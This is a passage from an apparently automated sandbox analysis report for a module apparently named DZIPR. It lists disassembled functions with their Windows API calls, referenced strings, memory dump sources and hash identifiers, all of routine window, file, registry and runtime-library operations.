SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6FE2FC28
GetWindowRect.USER32(?,?), ref: 6FE2FC42
GetWindowLongW.USER32(00000000,000000F0), ref: 6FE2FC58
CopyRect.USER32(?,?), ref: 6FE2FCA5
CopyRect.USER32(?,?), ref: 6FE2FCAF
GetWindowRect.USER32(00000000,?), ref: 6FE2FCB8

Part of subcall function 6FE2DE96: MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FE2DED6

CopyRect.USER32(?,?), ref: 6FE2FCD4

Strings

(, xrefs: 6FE2FC6E

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: Rect$Window$Copy$Long$ByteCharMessageMultiParentSendWide
String ID: (
API String ID: 1385303425-3887548279
Opcode ID: 521605ec799525d9f2eb099972da7151a21af7579c41df660b65dc0689b47b46
Instruction ID: b80b138c5cd37f687eb3d9f9ebf937e0524ab2a999096b21b82ea9aaf6e62b50
Opcode Fuzzy Hash: 521605ec799525d9f2eb099972da7151a21af7579c41df660b65dc0689b47b46
Instruction Fuzzy Hash: BE516172A04619ABDB00DBB8CD85AEE7FB9AF49314F250119E915F7280EB34E905CB94

Function 6FE3A11F Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,6FE4E928,0000000C,6FE3A25A,00000000,00000000), ref: 6FE3A131
__crt_waiting_on_module_handle.LIBCMT ref: 6FE3A13C

Part of subcall function 6FE35BCF: Sleep.KERNEL32(000003E8,00000000,?,6FE3A082,KERNEL32.DLL,?,6FE3A0CE), ref: 6FE35BDB
Part of subcall function 6FE35BCF: GetModuleHandleW.KERNEL32(6FE4C168,?,6FE3A082,KERNEL32.DLL,?,6FE3A0CE), ref: 6FE35BE4

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 6FE3A165
GetProcAddress.KERNEL32(?,DecodePointer), ref: 6FE3A175
__lock.LIBCMT ref: 6FE3A197
InterlockedIncrement.KERNEL32(6FE28ADA), ref: 6FE3A1A4
__lock.LIBCMT ref: 6FE3A1B8
___addlocaleref.LIBCMT ref: 6FE3A1D6

Strings

DecodePointer, xrefs: 6FE3A16D
EncodePointer, xrefs: 6FE3A159
$o, xrefs: 6FE3A18E
KERNEL32.DLL, xrefs: 6FE3A12B, 6FE3A130, 6FE3A13B

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: $o$DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-3531221583
Opcode ID: 9b7e48f0e0e708c5c7fc9342c8e3b12adba4b5359dcab47cfa636f9bc0510ceb
Instruction ID: b04072ded9c45aa256647c55bf8be7c5b46fa3538f8bf5a0501b3a36cd90519b
Opcode Fuzzy Hash: 9b7e48f0e0e708c5c7fc9342c8e3b12adba4b5359dcab47cfa636f9bc0510ceb
Instruction Fuzzy Hash: 0B11A2B2844B119FDB109F79D808B5EBFE0AF45728F30451ED49A97390CB34AA81DF54

Function 6FE284DA Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32), ref: 6FE28503
GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FE28520
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 6FE2852D
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 6FE2853A
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 6FE28547

Strings

ReleaseActCtx, xrefs: 6FE28522
ActivateActCtx, xrefs: 6FE2852F
KERNEL32, xrefs: 6FE284FE
DeactivateActCtx, xrefs: 6FE2853C
CreateActCtxW, xrefs: 6FE2851A

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-2424895508
Opcode ID: 0f6dc91dd259799f44a4849fc475d975dd7b14532d83fa41cf6766f98270edce
Instruction ID: 06e96aafec5c18d45edd19c9b3fe3ab3147ef39338739c8dcf46bddc4e118dd5
Opcode Fuzzy Hash: 0f6dc91dd259799f44a4849fc475d975dd7b14532d83fa41cf6766f98270edce
Instruction Fuzzy Hash: 661198B684DE55AFCF14AF559889406BFE69B87328724043FE108C7310E67196A0CB51

Function 6FE2A59C Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32,6FE2A6B6), ref: 6FE2A5AA
GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FE2A5CB
GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FE2A5DD
GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FE2A5EF
GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FE2A601

Part of subcall function 6FE26DC1: __CxxThrowException@8.LIBCMT ref: 6FE26DD7
Part of subcall function 6FE26DC1: __EH_prolog3.LIBCMT ref: 6FE26DE4

Strings

ReleaseActCtx, xrefs: 6FE2A5CD
ActivateActCtx, xrefs: 6FE2A5DF
KERNEL32, xrefs: 6FE2A5A5
DeactivateActCtx, xrefs: 6FE2A5F1
CreateActCtxW, xrefs: 6FE2A5C5

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 417325364-2424895508
Opcode ID: 5331b4b9e69dcda8d02f0f1cd8d89eb9be7668e19b95dda37c3be4be2e28f9fa
Instruction ID: 4b2ccf6bc9bde6a8e67d3e0c3eb2ed741215cec0bcd01b194fe65a7017d30c89
Opcode Fuzzy Hash: 5331b4b9e69dcda8d02f0f1cd8d89eb9be7668e19b95dda37c3be4be2e28f9fa
Instruction Fuzzy Hash: B6F0FE7880DE35AFCF456FB198155057EAEA787239B10441FA908D2210E7729138CF81

Function 6FE2C8E2 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 128COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6FE2C91F
PathFindExtensionW.SHLWAPI(?), ref: 6FE2C939
__wcsdup.LIBCMT ref: 6FE2C983
__wcsdup.LIBCMT ref: 6FE2C9C2
__wcsdup.LIBCMT ref: 6FE2CA14
__wcsdup.LIBCMT ref: 6FE2CA55

Strings

.HLP, xrefs: 6FE2C9F9
.INI, xrefs: 6FE2CA36
.CHM, xrefs: 6FE2C9F2

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: __wcsdup$ExtensionFileFindModuleNamePath
String ID: .CHM$.HLP$.INI
API String ID: 2477486372-4017452060
Opcode ID: c57a78769a088a88151439f19f2fdead7da6d2f810295b545a12466dd55c8b86
Instruction ID: 71beb688aa88b39e5fb792a82a3b3081c6bf245c662fb1f283dc9755a3f09a83
Opcode Fuzzy Hash: c57a78769a088a88151439f19f2fdead7da6d2f810295b545a12466dd55c8b86
Instruction Fuzzy Hash: 414184B1A007199BDB20DB79CC44B8ABBFDAF45328F2009AE9545D7290FF31E944CB51

Function 6FE31861 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6FE31868
GetPropW.USER32(?,AfxOldWndProc423), ref: 6FE31877
CallWindowProcW.USER32(?,?,00000110,?,00000000), ref: 6FE318D1

Part of subcall function 6FE30C2C: GetWindowRect.USER32(?,10000000), ref: 6FE30C56

SetWindowLongW.USER32(?,000000FC,?), ref: 6FE318F8
RemovePropW.USER32(?,AfxOldWndProc423), ref: 6FE31900
GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 6FE31907
GlobalDeleteAtom.KERNEL32(?), ref: 6FE31911
CallWindowProcW.USER32(?,?,?,?,00000000), ref: 6FE31965

Strings

AfxOldWndProc423, xrefs: 6FE31870, 6FE31875, 6FE318FE, 6FE31906

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
String ID: AfxOldWndProc423
API String ID: 2109165785-1060338832
Opcode ID: f4a50193dd2fc54d45186df88c38a89bbc06faea58a6c3cad93757856e8ccab9
Instruction ID: e98bb50ed152fe313d99765cfc65ba2eb3e9e78b4906c6fe96b9be9d21fd4729
Opcode Fuzzy Hash: f4a50193dd2fc54d45186df88c38a89bbc06faea58a6c3cad93757856e8ccab9
Instruction Fuzzy Hash: 37318132C0422AABCF019FE4CD4DDBF7EB9AF46319F10051DF601A6190C7399A21DBA1

Function 6FE21C00 Relevance: 13.7, APIs: 9, Instructions: 159fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,?,?,6FE21BE9,?,?,?,?), ref: 6FE21C39
GetLastError.KERNEL32(?,?,?,?,?,6FE21BE9,?,?,?,?), ref: 6FE21C48
__aullrem.LIBCMT ref: 6FE21C60
ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000), ref: 6FE21CE8
_memset.LIBCMT ref: 6FE21CF5
SetFilePointer.KERNEL32(?,?,00000000,00000001,?,?,?,?,6FE21BE9,?,?,?,?), ref: 6FE21D07

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: File$Pointer$ErrorLastRead__aullrem_memset
String ID:
API String ID: 123228641-0
Opcode ID: 458aefc36db192ab93d9388b9bee3aa30543b5fabed8bfe77a2a585cf9a6fe00
Instruction ID: 3cad4af13991ad7dafdd506b96f93acda8631ef60d708c1dbafeb59accce8cd7
Opcode Fuzzy Hash: 458aefc36db192ab93d9388b9bee3aa30543b5fabed8bfe77a2a585cf9a6fe00
Instruction Fuzzy Hash: 5E516F75A08701AFD740DE69C840B9BBBE8FF88764F10492DF958D7340E775EA058BA2

Function 6FE2BE0D Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6FE2BE14
EnterCriticalSection.KERNEL32(?,00000010,6FE2C0D0,?,00000000,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?,?), ref: 6FE2BE25
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?,?), ref: 6FE2BE43
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?), ref: 6FE2BE77
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?,?), ref: 6FE2BEE3
_memset.LIBCMT ref: 6FE2BF02
TlsSetValue.KERNEL32(?,00000000,?), ref: 6FE2BF13
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?,?), ref: 6FE2BF34

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: 58c920a574c04656a7f39442924efb753ec110640dd99daff61a873b80e9acb0
Instruction ID: 16fd871074a5c79376ac71033c94067a305d308cbd2ef3d9e6811291cfa41824
Opcode Fuzzy Hash: 58c920a574c04656a7f39442924efb753ec110640dd99daff61a873b80e9acb0
Instruction Fuzzy Hash: 9E315071904605AFDB10AF24CC85C5ABFF5FF05324B30C52EE65597690EB31AA55CF90

Function 6FE281FA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117threadwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 6FE2815A: GetParent.USER32(?), ref: 6FE281AE
Part of subcall function 6FE2815A: GetLastActivePopup.USER32(?), ref: 6FE281BF
Part of subcall function 6FE2815A: IsWindowEnabled.USER32(?), ref: 6FE281D3
Part of subcall function 6FE2815A: EnableWindow.USER32(?,00000000), ref: 6FE281E6

EnableWindow.USER32(?,00000001), ref: 6FE28247
GetWindowThreadProcessId.USER32(?,?), ref: 6FE2825B
GetCurrentProcessId.KERNEL32(?,?), ref: 6FE28265
SendMessageW.USER32(?,00000376,00000000,00000000), ref: 6FE2827D
GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 6FE282F9
EnableWindow.USER32(00000000,00000001), ref: 6FE28340

Strings

8mo, xrefs: 6FE281FC

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID: 8mo
API String ID: 1877664794-4096906208
Opcode ID: 01c730d764e7715bea74324069090027712b60ca7c429f7f6936c899ead56bfc
Instruction ID: 07cd4f65b7a0327147b078633784f6d6796b817c65291934ee783511cdda9ddf
Opcode Fuzzy Hash: 01c730d764e7715bea74324069090027712b60ca7c429f7f6936c899ead56bfc
Instruction Fuzzy Hash: 34417172A44A189BDB109F648C88BDA7FF4FF45714F24055BE915E6280E770EB918B90

Function 6FE2DE96 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FE2DED6
SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 6FE2DF00
GetSystemMetrics.USER32(00000000), ref: 6FE2DF17
GetSystemMetrics.USER32(00000001), ref: 6FE2DF1E
MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,-00000028,00000020), ref: 6FE2DF49

Strings

B, xrefs: 6FE2DEE0
DISPLAY, xrefs: 6FE2DF40

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: System$ByteCharMetricsMultiWide$InfoParameters
String ID: B$DISPLAY
API String ID: 381819527-3316187204
Opcode ID: b32352da4e4783692a0aa8316d96ed2c92a7a38c282ee5a82b4d5f4e60da04d3
Instruction ID: 567bd64aee3b35be2b5e14a2ae00b2534e73f39f2af5b679e4f4eb07b445a7cf
Opcode Fuzzy Hash: b32352da4e4783692a0aa8316d96ed2c92a7a38c282ee5a82b4d5f4e60da04d3
Instruction Fuzzy Hash: 2C21B875504620ABEF209F148C44B5B7FEAFF46764F214126FE189B284E6B0D551CBA1

Function 6FE288C8 Relevance: 12.1, APIs: 8, Instructions: 66memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(?), ref: 6FE288E7
lstrcmpW.KERNEL32(00000000,?), ref: 6FE288F4
OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 6FE28906
DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6FE28926
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6FE2892E
GlobalLock.KERNEL32(00000000), ref: 6FE28938
DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 6FE28945
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 6FE2895D

Part of subcall function 6FE2DAD1: GlobalFlags.KERNEL32(?), ref: 6FE2DAE0
Part of subcall function 6FE2DAD1: GlobalUnlock.KERNEL32(?), ref: 6FE2DAF2
Part of subcall function 6FE2DAD1: GlobalFree.KERNEL32(?), ref: 6FE2DAFD

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: bffbbc069711c388511a6f1401e76f466c9faaf4622076d6e99386b10937e07f
Instruction ID: 043194e3e0b6ae878e3faaf2355835e5f277cd9245b58cddbc06d77aff492420
Opcode Fuzzy Hash: bffbbc069711c388511a6f1401e76f466c9faaf4622076d6e99386b10937e07f
Instruction Fuzzy Hash: AF116D71504A04BBDB12ABA5CC48DAF7FEDFB85705B20041EFA05D6160E731EA11E760

Function 6FE2CD66 Relevance: 12.0, APIs: 8, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 6FE2CD75
GetSystemMetrics.USER32(0000000C), ref: 6FE2CD7C
GetSystemMetrics.USER32(00000002), ref: 6FE2CD83
GetSystemMetrics.USER32(00000003), ref: 6FE2CD8D
GetDC.USER32(00000000), ref: 6FE2CD97
GetDeviceCaps.GDI32(00000000,00000058), ref: 6FE2CDA8
GetDeviceCaps.GDI32(00000000,0000005A), ref: 6FE2CDB0
ReleaseDC.USER32(00000000,00000000), ref: 6FE2CDB8

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: 3cc667d606ff9daad5f88bd94a7e5fc50e9be2977ecfb566fae5bc49fc04b8c2
Instruction ID: fa1bcede52aae8dbe9c6d9a8de72fb841fc12c4cf746d71c8f3b51916236912e
Opcode Fuzzy Hash: 3cc667d606ff9daad5f88bd94a7e5fc50e9be2977ecfb566fae5bc49fc04b8c2
Instruction Fuzzy Hash: F9F06DB1E40B14BAEB106B728C49F167FA8EB42731F00851BE6048B2C0CAB698258FD0

Function 6FE3020C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6FE3029B
SendMessageW.USER32(00000000,00000433,00000000,?), ref: 6FE302C4
GetWindowLongW.USER32(?,000000FC), ref: 6FE302D6
GetWindowLongW.USER32(?,000000FC), ref: 6FE302E7
SetWindowLongW.USER32(?,000000FC,?), ref: 6FE30303

Strings

,, xrefs: 6FE302BA

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: ,
API String ID: 2997958587-3772416878
Opcode ID: 87adb1a11b9f2100d79ccc2403dfeee82f5d3cc7c7ad8196e0e719156ebff141
Instruction ID: ef83868935242bdd9151de463603c56e6fa537b97c1ec26f83d6362daf28f050
Opcode Fuzzy Hash: 87adb1a11b9f2100d79ccc2403dfeee82f5d3cc7c7ad8196e0e719156ebff141
Instruction Fuzzy Hash: 7E319132A007209FDB10AF75C888A5DBFF5BF89318F21152DE65697692EB30F404CB54

Function 6FE2A200 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6FE2A20A
RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 6FE2A2F0
RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FE2A30D
RegCloseKey.ADVAPI32(?), ref: 6FE2A32D
RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 6FE2A348

Strings

Software\, xrefs: 6FE2A26E

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: CloseEnumH_prolog3_OpenQueryValue
String ID: Software\
API String ID: 1666054129-964853688
Opcode ID: 52e2e393da1cf4daa9010467f57e2680b870b25ee7ed36aa1a5d2a2acbe27ed5
Instruction ID: bad63c613c1eafd6886055e3e6fda8a26d9b0be7b8ad698f32ab431e7982a701
Opcode Fuzzy Hash: 52e2e393da1cf4daa9010467f57e2680b870b25ee7ed36aa1a5d2a2acbe27ed5
Instruction Fuzzy Hash: D3419731941619ABCB21EBA4DC88EDEBBF9AF49714F2006DDE015E2190EB759F84CF50

